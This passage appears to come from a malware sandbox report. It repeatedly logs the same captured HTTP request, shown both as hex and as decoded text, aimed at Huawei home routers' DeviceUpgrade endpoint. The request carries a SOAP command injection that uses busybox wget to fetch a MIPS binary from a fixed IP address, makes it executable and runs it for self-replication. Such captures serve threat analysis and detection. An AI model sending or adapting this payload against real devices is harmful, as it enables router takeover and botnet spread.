75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 483Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 483Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 483Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 483Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 483Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 483Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 483Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 483Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 483Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 